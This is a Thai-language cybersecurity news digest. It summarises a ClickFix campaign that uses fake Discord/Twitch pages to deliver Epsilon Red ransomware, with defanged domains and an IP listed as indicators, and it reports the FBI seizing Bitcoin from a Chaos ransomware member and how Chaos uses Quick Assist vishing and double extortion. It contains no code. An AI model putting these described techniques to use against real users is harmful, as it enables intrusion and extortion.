เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่ ➡️ มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง ➡️ ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส ✅ โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี ➡️ เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269 ➡️ มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี ‼️ ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก ⛔ ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว ⛔ การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป ‼️ องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง ⛔ ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว ⛔ Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที ‼️ การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น ⛔ ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch ⛔ ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ ‼️ ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา ⛔ การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน ⛔ ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/

🎙️ เรื่องเล่าจากโลกไซเบอร์: เมื่อ FBI ปิดบัญชี Chaos ด้วย Bitcoin ในเดือนเมษายน 2025 FBI Dallas ได้ยึด Bitcoin จำนวน 20.2891382 BTC จากกระเป๋าเงินดิจิทัลของสมาชิกกลุ่ม Chaos ransomware ที่ใช้ชื่อว่า “Hors” ซึ่งเชื่อมโยงกับการโจมตีไซเบอร์และเรียกค่าไถ่จากเหยื่อในรัฐเท็กซัสและพื้นที่อื่น ๆ Chaos เป็นกลุ่มแรนซัมแวร์แบบ RaaS (Ransomware-as-a-Service) ที่เพิ่งเกิดขึ้นในเดือนกุมภาพันธ์ 2025 โดยเชื่อว่าเป็นการรวมตัวของอดีตสมาชิกกลุ่ม BlackSuit ซึ่งถูกปราบปรามโดยปฏิบัติการระหว่างประเทศชื่อ “Operation Checkmate” กลุ่ม Chaos ใช้เทคนิคการโจมตีแบบ double extortion คือการเข้ารหัสไฟล์ของเหยื่อและขโมยข้อมูลเพื่อข่มขู่เปิดเผยหากไม่จ่ายค่าไถ่ โดยเรียกเงินสูงถึง $300,000 ต่อราย และใช้วิธีหลอกลวงผ่านโทรศัพท์ให้เหยื่อเปิด Microsoft Quick Assist เพื่อให้แฮกเกอร์เข้าถึงระบบ ✅ FBI Dallas ยึด Bitcoin มูลค่ากว่า $2.4 ล้านจากสมาชิกกลุ่ม Chaos ➡️ ยึดจากกระเป๋าเงินดิจิทัลของ “Hors” ผู้ต้องสงสัยโจมตีไซเบอร์ในเท็กซัส ➡️ ยื่นคำร้องขอยึดทรัพย์แบบพลเรือนเพื่อโอนเข้ารัฐบาลสหรัฐฯ ✅ Chaos ransomware เป็นกลุ่มใหม่ที่เกิดขึ้นหลัง BlackSuit ถูกปราบปราม ➡️ มีลักษณะการโจมตีคล้าย BlackSuit เช่น การเข้ารหัสไฟล์และข่มขู่เปิดเผยข้อมูล ➡️ ใช้ชื่อ “.chaos” เป็นนามสกุลไฟล์ที่ถูกเข้ารหัส และ “readme.chaos.txt” เป็นโน้ตเรียกค่าไถ่ ✅ ใช้เทคนิคหลอกลวงผ่านโทรศัพท์และซอฟต์แวร์ช่วยเหลือระยะไกล ➡️ หลอกเหยื่อให้เปิด Microsoft Quick Assist เพื่อให้แฮกเกอร์เข้าถึงระบบ ➡️ ใช้เครื่องมือ RMM เช่น AnyDesk และ ScreenConnect เพื่อคงการเข้าถึง ✅ หากเหยื่อจ่ายเงิน จะได้รับ decryptor และรายงานช่องโหว่ของระบบ ➡️ สัญญาว่าจะลบข้อมูลที่ขโมยไปและไม่โจมตีซ้ำ ➡️ หากไม่จ่าย จะถูกข่มขู่ด้วยการเปิดเผยข้อมูลและโจมตี DDoS ✅ Chaos สามารถโจมตีระบบ Windows, Linux, ESXi และ NAS ได้ ➡️ ใช้การเข้ารหัสแบบ selective encryption เพื่อเพิ่มความเร็ว ➡️ มีระบบป้องกันการวิเคราะห์และหลบเลี่ยง sandbox/debugger ‼️ การใช้เครื่องมือช่วยเหลือระยะไกลอาจเปิดช่องให้แฮกเกอร์เข้าถึงระบบ ⛔ Microsoft Quick Assist ถูกใช้เป็นช่องทางหลักในการหลอกเหยื่อ ⛔ ผู้ใช้ควรตรวจสอบตัวตนผู้ขอความช่วยเหลือก่อนให้สิทธิ์เข้าถึง ‼️ การไม่จ่ายค่าไถ่อาจนำไปสู่การเปิดเผยข้อมูลและโจมตีเพิ่มเติม ⛔ Chaos ข่มขู่จะเปิดเผยข้อมูลต่อสาธารณะและโจมตี DDoS ⛔ ส่งผลต่อชื่อเสียงและความเชื่อมั่นขององค์กร ‼️ การใช้สกุลเงินดิจิทัลไม่สามารถปกปิดตัวตนได้เสมอไป ⛔ FBI สามารถติดตามและยึด Bitcoin ผ่านการวิเคราะห์บล็อกเชน ⛔ การใช้ crypto ไม่ได้หมายถึงความปลอดภัยจากการถูกจับกุม ‼️ กลุ่มแรนซัมแวร์มีแนวโน้มเปลี่ยนชื่อและกลับมาใหม่หลังถูกปราบปราม ⛔ Chaos อาจเป็นการรีแบรนด์จาก BlackSuit ซึ่งเดิมคือ Royal และ Conti ⛔ การปราบปรามต้องต่อเนื่องและครอบคลุมทั้งโครงสร้างพื้นฐานและการเงิน https://www.tomshardware.com/tech-industry/cryptocurrency/fbi-seizes-usd2-4-million-in-bitcoin-from-member-of-recently-ascendant-chaos-ransomware-group